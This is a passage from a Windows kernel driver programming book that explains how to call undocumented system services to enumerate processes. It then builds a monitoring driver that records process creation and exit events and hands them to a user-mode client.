I recommend you build the driver and the client and test them. The project names are KMelody and
Melody in the solution for this chapter. Build your own music!
1. Replace the call to IoCreateSystemThread with PsCreateSystemThread and
make the necessary adjustments.
2. Replace the lookaside list API with the newer API.
Invoking System Services
System Services (system calls) are normally invoked indirectly from user mode code. For example, calling
the Windows CreateFile API in user mode invokes NtCreateFile from NtDll.Dll, which is a
system call. This call traverses the user/kernel boundary, eventually calling the “real” NtCreateFile
implementation within the executive.
We already know that drivers can invoke system calls as well, using the Nt or the Zw variant (which sets
the previous execution mode to KernelMode before invoking the system call). Some of these system calls
are fully documented in the driver kit, such as NtCreateFile/ZwCreateFile. Others, however, are not
documented or sometimes partially documented.
For example, enumerating processes in the system is fairly easy to do from user-mode - in fact, there are
several APIs one can use for this purpose. They all invoke the NtQuerySystemInformation system
call, which is not officially documented in the WDK. Ironically, it’s provided in the user-mode header
Winternl.h like so:
NTSTATUS NtQuerySystemInformation (
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL);
The macros IN and OUT expand to nothing. These were used in the old days before SAL was invented to
provide some semantics for developers. For some reason, Winternl.h uses these macros rather than the
modern SAL annotations.
We can copy this definition and tweak it a bit by turning it into its Zw variant, more suitable for kernel
callers. The SYSTEM_INFORMATION_CLASS enumeration and associated data structures are the real data
we’re after. Some values are provided in user-mode and/or kernel-mode headers. Most of the values have
been “reversed engineered” and can be found in open source projects, such as Process Hacker². Although
these APIs might not be officially documnented, they are unlikely to change as Microsoft’s own tools
depend on many of them.
If the API in question only exists in certain Windows versions, it's possible to query dynamically for the
existence of a kernel API with MmGetSystemRoutineAddress:
PVOID MmGetSystemRoutineAddress (_In_ PUNICODE_STRING SystemRoutineName);
You can think of MmGetSystemRoutineAddress as the kernel-mode equivalent of the user-mode
GetProcAddress API.
Another very useful API is NtQueryInformationProcess, also defined in Winternl.h:
NTSTATUS NtQueryInformationProcess (
IN HANDLE ProcessHandle,
IN PROCESSINFOCLASS ProcessInformationClass,
OUT PVOID ProcessInformation,
IN ULONG ProcessInformationLength,
OUT PULONG ReturnLength OPTIONAL);
Curiously enough, the kernel-mode headers provide many of the PROCESSINFOCLASS enumeration
values, along with their associated data structures, but not the definition of this system call itself. Here is
a partial set of values for PROCESSINFOCLASS:
²https://github.com/processhacker/phnt
typedef enum _PROCESSINFOCLASS {
ProcessBasicInformation = 0,
ProcessDebugPort = 7,
ProcessWow64Information = 26,
ProcessImageFileName = 27,
ProcessBreakOnTermination = 29
} PROCESSINFOCLASS;
A more complete list is available in ntddk.h. A full list is available within the Process Hacker
project.
The following example shows how to query the current process image file name. ProcessImageFileName
seems to be the way to go, and it expects a UNICODE_STRING as the buffer:
ULONG size = 1024;
auto buffer = ExAllocatePoolWithTag(PagedPool, size, DRIVER_TAG);
auto status = ZwQueryInformationProcess(NtCurrentProcess(),
ProcessImageFileName, buffer, size, nullptr);
if(NT_SUCCESS(status)) {
auto name = (UNICODE_STRING*)buffer;
// do something with name...
}
ExFreePool(buffer);
Example: Enumerating Processes
The EnumProc driver shows how to call ZwQuerySystemInformation to retrieve the list of running
processes. DriverEntry calls the EnumProcesses function that does all the work and dumps information
using simple DbgPrint calls. Then DriverEntry returns an error so the driver is unloaded.
First, we need the definition of ZwQuerySystemInformation and the required enum value and
structure which we can copy from Winternl.h:
#include <ntddk.h>
// copied from <WinTernl.h>
enum SYSTEM_INFORMATION_CLASS {
SystemProcessInformation = 5,
};
typedef struct _SYSTEM_PROCESS_INFORMATION {
ULONG NextEntryOffset;
ULONG NumberOfThreads;
UCHAR Reserved1[48];
UNICODE_STRING ImageName;
KPRIORITY BasePriority;
HANDLE UniqueProcessId;
PVOID Reserved2;
ULONG HandleCount;
ULONG SessionId;
PVOID Reserved3;
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG Reserved4;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
PVOID Reserved5;
SIZE_T QuotaPagedPoolUsage;
PVOID Reserved6;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
SIZE_T PrivatePageCount;
LARGE_INTEGER Reserved7[6];
} SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION;
extern "C" NTSTATUS ZwQuerySystemInformation(
SYSTEM_INFORMATION_CLASS info,
PVOID buffer,
ULONG size,
PULONG len);
Notice there are lots of "reserved" members in SYSTEM_PROCESS_INFORMATION. We'll manage with
what we get, but you can find the full data structure in the Process Hacker project.
EnumProc starts by querying the number of bytes needed, by calling ZwQuerySystemInformation
with a null buffer and zero size; the required size is returned through the last parameter:
void EnumProcesses() {
ULONG size = 0;
ZwQuerySystemInformation(SystemProcessInformation, nullptr, 0, &size);
size += 1 << 12;    // 4KB, just to make sure the next call succeeds
We want to allocate some more in case new processes are created between this call and the next “real” call.
We can write the code in a more robust way, with a loop that queries until the size is large enough,
but the above approach is good enough for most purposes.
Next, we allocate the required buffer and make the call again, this time with the real buffer:
auto buffer = ExAllocatePoolWithTag(PagedPool, size, 'cprP');
if (!buffer)
return;
if (NT_SUCCESS(ZwQuerySystemInformation(SystemProcessInformation,
buffer, size, nullptr))) {
If the call succeeds, we can start iterating. The returned pointer references the first process; each
subsequent process is located NextEntryOffset bytes from the current one. The enumeration ends when
NextEntryOffset is zero:
auto info = (SYSTEM_PROCESS_INFORMATION*)buffer;
ULONG count = 0;
for (;;) {
DbgPrint("PID: %u Session: %u Handles: %u Threads: %u Image: %wZ\n",
HandleToULong(info->UniqueProcessId),
info->SessionId, info->HandleCount,
info->NumberOfThreads, info->ImageName);
count++;
if (info->NextEntryOffset == 0)
break;
info = (SYSTEM_PROCESS_INFORMATION*)((PUCHAR)info + info->NextEntryOffset);
}
DbgPrint("Total Processes: %u\n", count);
We output some of the details provided in the SYSTEM_PROCESS_INFORMATION structure and count the
number of processes while we're at it. The only thing left to do in this simple example is to clean up:
}
ExFreePool(buffer);
}
As mentioned, DriverEntry is simple:
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath);
EnumProcesses();
return STATUS_UNSUCCESSFUL;
}
Given this knowledge, we can make the KMelody driver a bit better by creating our thread in a Csrss.exe
process for the current session, instead of the first client process that comes in. This is better, since Csrss
always exists, and is in fact a critical process - one that if killed for whatever reason, causes the system to
crash.
Killing Csrss is not easy, since it’s a protected process starting with Windows 8.1, but kernel code can
certainly do that.
1. Modify the KMelody driver to create the thread in a Csrss process for the current session.
Search for Csrss with ZwQuerySystemInformation and create the thread in that
process.
2. Add support for multiple sessions, where there is one playback thread per ses-
sion. Hint: call ZwQueryInformationProcess with ProcessSessionId to find
out the session a process is part of. Manage a list of PlaybackState ob-
jects, one for each session. You can also use the undocumented (but exported)
PsGetCurrentProcessSessionId API.
Summary
In this chapter, we were introduced to some programming techniques that are useful in many types of
drivers. We’re not done with these techniques - there will be more in chapter 11. But for now, we can
begin using some kernel-provided notifications, starting with Process and Thread notifications in the next
chapter.
Chapter 9: Process and Thread
Notifications
One of the powerful mechanisms available for kernel drivers is the ability to be notified when certain
important events occur. In this chapter, we’ll look into some of these events, namely process creation and
destruction, thread creation and destruction, and image loads.
In this chapter:
• Process Notifications
• Implementing Process Notifications
• Providing Data to User Mode
• Thread Notifications
• Image Load Notifications
• Remote Thread Detection
Process Notifications
Whenever a process is created or destroyed, interested drivers can be notified by the kernel of that fact.
This allows drivers to keep track of processes, possibly associating some data with these processes. At the
very minimum, these allow drivers to monitor process creation/destruction in real-time. By “real-time”
I mean that the notifications are sent “in-line”, as part of process creation; the driver cannot miss any
processes that may be created and destroyed quickly.
For process creation, drivers also have the power to stop the process from being fully created, returning
an error to the caller that initiated process creation. This kind of power can only be directly achieved in
kernel mode.
Windows provides other mechanisms for being notified when processes are created or destroyed. For
example, using Event Tracing for Windows (ETW), such notifications can be received by a user-mode
process (running with elevated privileges). However, there is no way to prevent a process from being
created. Furthermore, ETW has an inherent notification delay of about 1-3 seconds (it uses internal
buffers for performance reasons), so a short-lived process may exit before the creation notification arrives.
Opening a handle to the created process at that time would no longer be possible.
The main API for registering for process notifications is PsSetCreateProcessNotifyRoutineEx,
defined like so:
NTSTATUS PsSetCreateProcessNotifyRoutineEx (
_In_ PCREATE_PROCESS_NOTIFY_ROUTINE_EX NotifyRoutine,
_In_ BOOLEAN Remove);
There is currently a system-wide limit of 64 registrations, so it’s theoretically possible for the
registration function to fail.
The first argument is the driver’s callback routine, having the following prototype:
void ProcessNotifyCallback(
    _Inout_ PEPROCESS Process,
    _In_ HANDLE ProcessId,
    _Inout_opt_ PPS_CREATE_NOTIFY_INFO CreateInfo);
The second argument to PsSetCreateProcessNotifyRoutineEx indicates whether the driver is
registering or unregistering the callback (FALSE indicates the former). Typically, a driver will call this
API with FALSE in its DriverEntry routine and call the same API with TRUE in its Unload routine.
The parameters to the process notification routine are as follows:
• Process - the process object of the newly created process, or the process being destroyed.
• Process Id - the unique process ID of the process. Although it’s declared with type HANDLE, it’s in
fact an ID.
• CreateInfo - a structure that contains detailed information on the process being created. If the process
is being destroyed, this argument is NULL.
For process creation, the driver’s callback routine is executed by the creating thread (running as part of
the creating process). For process exit, the callback is executed by the last thread to exit the process. In
both cases, the callback is called inside a critical region (where normal kernel APCs are disabled).
Starting with Windows 10 version 1607, there is another function for process notifications: PsSetCreateProcessNotifyRoutineEx2.
This "extended" function sets up a callback similar to the previous one, but the callback is also invoked
for Pico processes. Pico processes are those used to host Linux processes for the Windows Subsystem for
Linux (WSL) version 1. If a driver is interested in such processes, it must register with the extended
function.
A driver using these callbacks must have the IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY flag
in its Portable Executable (PE) image header. Without it, the call to the registration function returns
STATUS_ACCESS_DENIED (unrelated to driver test signing mode). Currently, Visual Studio does not
provide UI for setting this flag. It must be set in the linker command-line options with /integritycheck.
Figure 9-1 shows the project properties where this setting is specified.
Figure 9-1: /integritycheck linker switch in Visual Studio
The data structure provided for process creation is defined like so:
typedef struct _PS_CREATE_NOTIFY_INFO {
_In_ SIZE_T Size;
union {
_In_ ULONG Flags;
struct {
_In_ ULONG FileOpenNameAvailable : 1;
_In_ ULONG IsSubsystemProcess : 1;
_In_ ULONG Reserved : 30;
};
};
_In_ HANDLE ParentProcessId;
_In_ CLIENT_ID CreatingThreadId;
_Inout_ struct _FILE_OBJECT *FileObject;
_In_ PCUNICODE_STRING ImageFileName;
_In_opt_ PCUNICODE_STRING CommandLine;
_Inout_ NTSTATUS CreationStatus;
} PS_CREATE_NOTIFY_INFO, *PPS_CREATE_NOTIFY_INFO;
Here is a description of the important fields in this structure:
• CreatingThreadId - a combination of thread and process Id of the creator of the process.
• ParentProcessId - the parent process ID (not a handle). This process is usually the same as provided
by CreatingThreadId.UniqueProcess, but may be different, as it's possible, as part of process
creation, to pass in a different parent process to inherit certain properties from. See the user-mode
documentation for UpdateProcThreadAttribute with the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute.
• ImageFileName - the image file name of the executable, available if the flag FileOpenNameAvail-
able is set.
• CommandLine - the full command line used to create the process. Note that in some cases it may
be NULL.
• IsSubsystemProcess - this flag is set if this process is a Pico process. This can only happen if the
driver registered using PsSetCreateProcessNotifyRoutineEx2.
• CreationStatus - this is the status that would return to the caller. It’s set to STATUS_SUCCESS when
the callback is invoked. This is where the driver can stop the process from being created by placing
some failure status in this member (e.g. STATUS_ACCESS_DENIED). If the driver fails the creation,
subsequent drivers that may have set up their own callbacks will not be called.
Implementing Process Notifications
To demonstrate process notifications, we’ll build a driver that gathers information on process creation
and destruction and allow this information to be consumed by a user-mode client. This is similar to tools
such as Process Monitor and SysMon from Sysinternals, which use process and thread notifications for
reporting process and thread activity. During the course of implementing this driver, we’ll leverage some
of the techniques we learned in previous chapters.
Our driver name is going to be SysMon (unrelated to the SysMon tool). It will store all process
creation/destruction information in a linked list. Since this linked list may be accessed concurrently by
multiple threads, we need to protect it with a mutex or a fast mutex; we’ll go with fast mutex, as it’s
slightly more efficient.
The data we gather will eventually find its way to user mode, so we should declare common structures
that the driver produces and a user-mode client consumes. We’ll add a common header file named
SysMonPublic.h to the driver project and define a few structures. We start with a common header for
all information structures we need to collect:
enum class ItemType : short {
None,
ProcessCreate,
ProcessExit
};
struct ItemHeader {
ItemType Type;
USHORT Size;
LARGE_INTEGER Time;
};
The ItemType enum defined above uses the C++ 11 scoped enum feature, where enum values
have a scope (ItemType in this case). These enums can also have a non-int size - short in
the example. If you’re using C, you can use classic enums, or even #defines if you prefer.
The ItemHeader structure holds information common to all event types: the type of the event, the time
of the event (expressed as a 64-bit integer), and the size of the payload. The size is important, as each event
has its own information. If we later wish to pack an array of these events and (say) provide them to a
user-mode client, the client needs to know where each event ends and the next one begins.
Once we have this common header, we can derive other data structures for particular events. Let’s start
with the simplest - process exit:
struct ProcessExitInfo : ItemHeader {
ULONG ProcessId;
ULONG ExitCode;
};
For the process exit event, there is just one interesting piece of information (besides the header and the
process ID) - the exit status (code) of the process. This is normally the value returned from a user-mode main
function.
If you’re using C, then inheritance is not available to you. However, you can simulate it by
having the first member be of type ItemHeader and then adding the specific members; The
memory layout is the same.
struct ProcessExitInfo {
    ItemHeader Header;
    ULONG ProcessId;
    ULONG ExitCode;
};
The type used for a process ID is ULONG - process IDs (and thread IDs) cannot be larger than 32-bit.
HANDLE is not a good idea, as user mode may be confused by it. Also, HANDLE has a different size in a
32-bit process as opposed to a 64-bit process, so it’s best to avoid “bitness”-affected members. If you’re
familiar with user-mode programming, DWORD is a common typedef for a 32-bit unsigned integer. It’s
not used here because DWORD is not defined in the WDK headers. Although it’s pretty easy to define it
explicitly, it’s simpler just to use ULONG, which means the same thing and is defined in user-mode and
kernel-mode headers.
Since we need to store every such structure as part of a linked list, each data structure must contain a
LIST_ENTRY instance that points to the next and previous items. Since these LIST_ENTRY objects should
not be exposed to user-mode, we will define extended structures containing these entries in a different file,
that is not shared with user-mode.
There are several ways to define a "bigger" structure to hold the LIST_ENTRY. One way is to create a
templated type that has a LIST_ENTRY at the beginning (or end) like so:
template<typename T>
struct FullItem {
LIST_ENTRY Entry;
T Data;
};
The layout of FullItem<T> is shown in figure 9-2.
Figure 9-2: FullItem<T> layout
A templated class is used to avoid creating a multitude of types, one for each specific event type. For
example, we could create the following structure specifically for a process exit event:
struct FullProcessExitInfo {
LIST_ENTRY Entry;
ProcessExitInfo Data;
};
We could even inherit from LIST_ENTRY and then just add the ProcessExitInfo structure. But this
is not elegant, as our data has nothing to do with LIST_ENTRY, so inheriting from it is artificial and
should be avoided.
The FullItem<T> type saves the hassle of creating these individual types.
IF you’re using C, then templates are not available, and you must use the above structure
approach. I’m not going to mention C again in this chapter - there is always a workaround that
can be used if you have to.
Another way to accomplish something similar without using templates is to use a union to hold
all the possible variants. For example:
struct ItemData : ItemHeader {
union {
ProcessCreateInfo ProcessCreate;
// TBD
ProcessExitInfo ProcessExit;
};
};
Then we just extend the list of data members in the union. The full item would be just a simple extension:
struct FullItem {
LIST_ENTRY Entry;
ItemData Data;
};
The rest of the code uses the first option (with the template). The reader is encouraged to try the second
option.
The head of our linked list must be stored somewhere. We’ll create a data structure that will hold all
the global state of the driver, instead of creating separate global variables. Here is the definition of our
structure (in Globals.h in the sample code for this chapter):
#include "FastMutex.h"
struct Globals {
void Init(ULONG maxItems);
bool AddItem(LIST_ENTRY* entry);
LIST_ENTRY* RemoveItem();
private:
LIST_ENTRY m_ItemsHead;
ULONG m_Count;
ULONG m_MaxCount;
FastMutex m_Lock;
};
The FastMutex type used is the same one we developed in chapter 6.
Init is used to initialize the data members of the structure. Here is its implementation (in Globals.cpp):
void Globals::Init(ULONG maxCount) {
InitializeListHead(&m_ItemsHead);
m_Lock.Init();
m_Count = 0;
m_MaxCount = maxCount;
}
m_MaxCount holds the maximum number of elements in the linked list. This will be used to prevent
the list from growing arbitrarily large if a client does not request data for a while. m_Count holds the
current number of items in the list. The list itself is initialized with the normal InitializeListHead
API. Finally, the fast mutex is initialized by invoking its own Init method as implemented in chapter 6.
The DriverEntry Routine
The DriverEntry for the SysMon driver is similar to the one in the Zero driver from chapter 7. We have
to add process notification registration and proper initialization of our Globals object:
// in SysMon.cpp
Globals g_State;
extern "C"
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING) {
auto status = STATUS_SUCCESS;
PDEVICE_OBJECT DeviceObject = nullptr;
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\sysmon");
bool symLinkCreated = false;
do {
UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\sysmon");
status = IoCreateDevice(DriverObject, 0, &devName,
FILE_DEVICE_UNKNOWN, 0, TRUE, &DeviceObject);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "failed to create device (0x%08X)\n",
status));
break;
}
DeviceObject->Flags |= DO_DIRECT_IO;
status = IoCreateSymbolicLink(&symLink, &devName);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "failed to create sym link (0x%08X)\n",
status));
break;
}
symLinkCreated = true;
status = PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, FALSE);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX
"failed to register process callback (0x%08X)\n",
status));
break;
}
} while (false);
if (!NT_SUCCESS(status)) {
if (symLinkCreated)
IoDeleteSymbolicLink(&symLink);
if (DeviceObject)
IoDeleteDevice(DeviceObject);
return status;
}
g_State.Init(10000);    // hard-coded limit for now
DriverObject->DriverUnload = SysMonUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] = SysMonCreateClose;
DriverObject->MajorFunction[IRP_MJ_READ] = SysMonRead;
return status;
}
The device object’s flags are adjusted to use Direct I/O for read/write operations (DO_DIRECT_IO). The
device is created as exclusive (TRUE in the second-to-last argument to IoCreateDevice), so that only a
single client can open a handle to the device at a time. This makes sense here: if multiple clients read from
the device, each would receive only part of the data, since every event is removed from the queue once
reported. We’ll use the read dispatch routine to return event information to a client.
The create and close dispatch routines are handled in the simplest possible way - just completing them
successfully, with the help of CompleteRequest we have encountered before:
NTSTATUS CompleteRequest(PIRP Irp,
NTSTATUS status = STATUS_SUCCESS, ULONG_PTR info = 0) {
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = info;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
NTSTATUS SysMonCreateClose(PDEVICE_OBJECT, PIRP Irp) {
return CompleteRequest(Irp);
}
Handling Process Exit Notifications
The process notification function in the code above is OnProcessNotify and has the prototype outlined
earlier in this chapter. This callback handles process creation and exit. Let’s start with process exit, as it’s
much simpler than process creation (as we shall soon see). The basic outline of the callback is as follows:
void OnProcessNotify(PEPROCESS Process, HANDLE ProcessId,
PPS_CREATE_NOTIFY_INFO CreateInfo) {
if (CreateInfo) {
// process create
}
else {
// process exit
}
}
For process exit we have just the process ID we need to save, along with the header data common to all
events. First, we need to allocate storage for the full item representing this event:
auto info = (FullItem<ProcessExitInfo>*)ExAllocatePoolWithTag(PagedPool,
sizeof(FullItem<ProcessExitInfo>), DRIVER_TAG);
if (info == nullptr) {
KdPrint((DRIVER_PREFIX "failed allocation\n"));
return;
}
If the allocation fails, there is really nothing the driver can do, so it just returns from the callback.
Now it’s time to fill the generic information: time, item type and size, all of which are easy to get:
auto& item = info->Data;
KeQuerySystemTimePrecise(&item.Time);
item.Type = ItemType::ProcessExit;
item.Size = sizeof(ProcessExitInfo);
item.ProcessId = HandleToULong(ProcessId);
item.ExitCode = PsGetProcessExitStatus(Process);
PushItem(&info->Entry);
First, we dig into the data item itself (bypassing the LIST_ENTRY) with the item variable. Next, we
fill the header information: The item type is well-known, since we are in the branch handling a process
exit notification; the time can be obtained with KeQuerySystemTimePrecise that returns the current
system time (UTC, not local time) as a 64-bit integer counting from January 1, 1601 at midnight Universal
Time. Finally, the item size is constant and is the size of the user-facing data structure (not the size of the
FullItem<ProcessExitInfo>).
Notice the item variable is a reference to the data; without the reference (&), a copy would
have been created, which is not what we want.
The KeQuerySystemTimePrecise API is available starting with Windows 8. For earlier
versions, the KeQuerySystemTime API should be used instead.
The specific data for a process exit event consists of the process ID and the exit code. The process ID is
provided directly by the callback itself. The only thing to do is call HandleToULong so the correct cast
is used to turn a HANDLE value into an unsigned 32-bit integer. The exit code is not given directly, but it’s
easy to retrieve with PsGetProcessExitStatus:
NTSTATUS PsGetProcessExitStatus(_In_ PEPROCESS Process);
All that’s left to do now is add the new item to the end of our linked list. For this purpose, we’ll define and
implement a function named AddItem in the Globals class:
void Globals::AddItem(LIST_ENTRY* entry) {
Locker locker(m_Lock);
if (m_Count == m_MaxCount) {
auto head = RemoveHeadList(&m_ItemsHead);
ExFreePool(CONTAINING_RECORD(head,
FullItem<ItemHeader>, Entry));
m_Count--;
}
InsertTailList(&m_ItemsHead, entry);
m_Count++;
}
AddItem uses the Locker<T> we saw in earlier chapters to acquire the fast mutex (and release it when
the variable goes out of scope) before manipulating the linked list. Remember to set the C++ standard to
at least C++17 in the project’s properties, so that Locker can be used without explicitly specifying the
type it works on (the compiler infers it).
We’ll add new items to the tail of the list. If the number of items in the list is at its maximum, the function
removes the first item (from the head) and frees it with ExFreePool, decrementing the item count.
This is not the only way to handle the case where the number of items is too large. Feel free to use other
ways. A more “precise” way might be tracking the number of bytes used, rather than number of items,
because each item is different in size.
We don’t need to use atomic increment/decrement operations in the AddItem function because
manipulation of the item count is always done under the protection of the fast mutex.
With AddItem implemented, we can call it from our process notify routine:
g_State.AddItem(&info->Entry);
Implement the limit by reading from the registry in DriverEntry. Hint: you can use APIs
such as ZwOpenKey or IoOpenDeviceRegistryKey and then ZwQueryValueKey. We’ll
look at these APIs more closely in chapter 11.
Handling Process Create Notifications
Process create notifications are more complex because the amount of information varies. The command
line length is different for different processes. First we need to decide what information to store for process
creation. Here is a first try:
struct ProcessCreateInfo : ItemHeader {
ULONG ProcessId;
ULONG ParentProcessId;
WCHAR CommandLine[1024];
};
We choose to store the process ID, the parent process ID, and the command line. This structure can work,
and it’s fairly easy to deal with because its size is known in advance.
What might be an issue with the above declaration?
The potential issue here is with the command line. Declaring the command line with constant size is simple,
but not ideal. If the command line is longer than allocated, the driver would have to trim it, possibly hiding
important information. If the command line is shorter than the defined limit, the structure is wasting
memory.
Can we use something like this?
struct ProcessCreateInfo : ItemHeader {
ULONG ProcessId;
ULONG ParentProcessId;
UNICODE_STRING CommandLine;
// can this work?
};
This cannot work. First, UNICODE_STRING is not normally defined in user-mode headers. Second
(and much worse), the internal pointer to the actual characters would normally point to system space,
inaccessible to user mode. Third, how would that string eventually be freed?
Here is another option, which we’ll use in our driver:
struct ProcessCreateInfo : ItemHeader {
ULONG ProcessId;
ULONG ParentProcessId;
ULONG CreatingThreadId;
ULONG CreatingProcessId;
USHORT CommandLineLength;
WCHAR CommandLine[1];
};
We’ll store the command line length and copy the actual characters at the end of the structure, starting
from CommandLine. The array size is specified as 1 just to make it easier to work with in the code. The
actual number of characters is provided by CommandLineLength.
Given this declaration, we can begin implementation for process creation (CreateInfo is non-NULL):
USHORT allocSize = sizeof(FullItem<ProcessCreateInfo>);
USHORT commandLineSize = 0;
if (CreateInfo->CommandLine) {
commandLineSize = CreateInfo->CommandLine->Length;
allocSize += commandLineSize;
}
auto info = (FullItem<ProcessCreateInfo>*)ExAllocatePoolWithTag(
PagedPool, allocSize, DRIVER_TAG);
if (info == nullptr) {
KdPrint((DRIVER_PREFIX "failed allocation\n"));
return;
}
The total size for an allocation is based on the command line length (if any). Now it’s time to fill in the
fixed-size details:
auto& item = info->Data;
KeQuerySystemTimePrecise(&item.Time);
item.Type = ItemType::ProcessCreate;
item.Size = sizeof(ProcessCreateInfo) + commandLineSize;
item.ProcessId = HandleToULong(ProcessId);
item.ParentProcessId = HandleToULong(CreateInfo->ParentProcessId);
item.CreatingProcessId = HandleToULong(
CreateInfo->CreatingThreadId.UniqueProcess);
item.CreatingThreadId = HandleToULong(
CreateInfo->CreatingThreadId.UniqueThread);
The item size must be calculated to include the command line length.
Next, we need to copy the command line to the address where CommandLine begins, and set the correct
command line length:
if (commandLineSize > 0) {
memcpy(item.CommandLine, CreateInfo->CommandLine->Buffer, commandLineSize);
item.CommandLineLength = commandLineSize / sizeof(WCHAR); // len in WCHARs
}
else {
item.CommandLineLength = 0;
}
g_State.AddItem(&info->Entry);
The command line length is stored in characters, rather than bytes. This is not mandatory, of course, but
is probably easier for user-mode code to consume. Notice the command line is not NULL-terminated - it’s
up to the client not to read too many characters. As an alternative, we can make the string NULL-terminated
to simplify client code. In fact, if we do that, the command line length is not even needed.
Make the command line NULL-terminated and remove the command line length.
Astute readers may notice that the calculated data length is actually one character longer
than needed, perfect for adding a NULL-terminator. Why? sizeof(ProcessCreateInfo)
includes one character of the command line.
For easier reference, here is the complete process notify callback implementation:
void OnProcessNotify(PEPROCESS Process, HANDLE ProcessId,
PPS_CREATE_NOTIFY_INFO CreateInfo) {
if (CreateInfo) {
USHORT allocSize = sizeof(FullItem<ProcessCreateInfo>);
USHORT commandLineSize = 0;
if (CreateInfo->CommandLine) {
commandLineSize = CreateInfo->CommandLine->Length;
allocSize += commandLineSize;
}
auto info = (FullItem<ProcessCreateInfo>*)ExAllocatePoolWithTag(
PagedPool, allocSize, DRIVER_TAG);
if (info == nullptr) {
KdPrint((DRIVER_PREFIX "failed allocation\n"));
return;
}
auto& item = info->Data;
KeQuerySystemTimePrecise(&item.Time);
item.Type = ItemType::ProcessCreate;
item.Size = sizeof(ProcessCreateInfo) + commandLineSize;
item.ProcessId = HandleToULong(ProcessId);
item.ParentProcessId = HandleToULong(CreateInfo->ParentProcessId);
item.CreatingProcessId = HandleToULong(
CreateInfo->CreatingThreadId.UniqueProcess);
item.CreatingThreadId = HandleToULong(
CreateInfo->CreatingThreadId.UniqueThread);
if (commandLineSize > 0) {
memcpy(item.CommandLine, CreateInfo->CommandLine->Buffer,
commandLineSize);
item.CommandLineLength = commandLineSize / sizeof(WCHAR);
}
else {
item.CommandLineLength = 0;
}
g_State.AddItem(&info->Entry);
}
else {
auto info = (FullItem<ProcessExitInfo>*)ExAllocatePoolWithTag(
PagedPool, sizeof(FullItem<ProcessExitInfo>), DRIVER_TAG);
if (info == nullptr) {
KdPrint((DRIVER_PREFIX "failed allocation\n"));
return;
}
auto& item = info->Data;
KeQuerySystemTimePrecise(&item.Time);
item.Type = ItemType::ProcessExit;
item.ProcessId = HandleToULong(ProcessId);
item.Size = sizeof(ProcessExitInfo);
item.ExitCode = PsGetProcessExitStatus(Process);
g_State.AddItem(&info->Entry);
}
}
Providing Data to User Mode
The next thing to consider is how to provide the gathered information to a user-mode client. There are
several options that could be used, but for this driver we’ll let the client poll the driver for information
using a read request. The driver will fill the user-provided buffer with as many events as possible, until
either the buffer is exhausted or there are no more events in the queue.
We’ll start the read request by obtaining the address of the user’s buffer with Direct I/O (set up in
DriverEntry):
NTSTATUS SysMonRead(PDEVICE_OBJECT, PIRP Irp) {
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
auto len = irpSp->Parameters.Read.Length;
auto status = STATUS_SUCCESS;
ULONG bytes = 0;
NT_ASSERT(Irp->MdlAddress);    // we're using Direct I/O
auto buffer = (PUCHAR)MmGetSystemAddressForMdlSafe(
Irp->MdlAddress, NormalPagePriority);
if (!buffer) {
status = STATUS_INSUFFICIENT_RESOURCES;
}
Now we need to access our linked list and pull items from its head. We’ll add this support to the Globals
class by implementing a method that removes an item from the head and returns it. If the list is empty, it
returns NULL:
LIST_ENTRY* Globals::RemoveItem() {
Locker locker(m_Lock);
auto item = RemoveHeadList(&m_ItemsHead);
if (item == &m_ItemsHead)
return nullptr;
m_Count--;
return item;
}
If the linked list is empty, RemoveHeadList returns the head itself. It’s also possible to use IsListEmpty
to make that determination. Lastly, we can check if m_Count is zero - all these are equivalent. If there is
an item, it’s returned as a LIST_ENTRY pointer.
Back to the Read dispatch routine - we can now loop around, getting an item out, copying its data to the
user-mode buffer, until the list is empty or the buffer is full:
else {
while (true) {
auto entry = g_State.RemoveItem();
if (entry == nullptr)
break;
//
// get pointer to the actual data item
//
auto info = CONTAINING_RECORD(entry, FullItem<ItemHeader>, Entry);
auto size = info->Data.Size;
if (len < size) {
//
// user's buffer too small, insert item back
//
g_State.AddHeadItem(entry);
break;
}
memcpy(buffer, &info->Data, size);
len -= size;
buffer += size;
bytes += size;
ExFreePool(info);
}
}
return CompleteRequest(Irp, status, bytes);
Globals::RemoveItem is called to retrieve the head item (if any). Then we have to check if the
remaining bytes in the user’s buffer are enough to contain the data of this item. If not, we have to push
the item back to the head of the queue, accomplished with another method in the Globals class:
void Globals::AddHeadItem(LIST_ENTRY* entry) {
Locker locker(m_Lock);
InsertHeadList(&m_ItemsHead, entry);
m_Count++;
}
If there is enough room in the buffer, a simple memcpy is used to copy the actual data (everything except
the LIST_ENTRY) to the user’s buffer. Finally, the variables are adjusted based on the size of this item and
the loop repeats.
Once out of the loop, the only thing remaining is to complete the request with whatever status and
information (bytes) have been accumulated thus far.
We need to take a look at the unload routine as well. If there are items in the linked list, they must be freed
explicitly; otherwise, we have a leak on our hands:
void SysMonUnload(PDRIVER_OBJECT DriverObject) {
PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, TRUE);
LIST_ENTRY* entry;
while ((entry = g_State.RemoveItem()) != nullptr)
ExFreePool(CONTAINING_RECORD(entry, FullItem<ItemHeader>, Entry));
